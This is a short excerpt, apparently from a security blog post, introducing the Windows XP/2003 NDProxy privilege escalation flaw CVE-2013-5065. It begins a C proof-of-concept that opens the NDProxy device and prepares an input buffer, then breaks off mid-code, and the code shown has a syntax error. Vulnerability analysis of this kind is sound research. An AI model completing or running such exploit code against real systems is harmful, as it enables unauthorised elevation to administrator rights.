NDProxy Privilege Escalation (CVE-2013-5065)

Introduction In the last few days everyone is raving about CVE-2013-5065, a new Windows XP/2k3 privilege escalation, well documented by FireEye. Googling around, we came across a Twitter message which contained a link to a Chinese vulnerability analysis and PoC for CVE-2013-5065. Exploit POC: #include “windows.h” #include “stdio.h” void main(){ HANDLE hdev=CreateFile(“\\.\NDProxy”,GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0 , NULL); if hdev==INVALID_HANDLE_VALUE){ printf(“CreateFile Failed: %d/n”,GetLastError()); } DWORD InBuf [0x15] = {0}; DWORD dwRetbytes…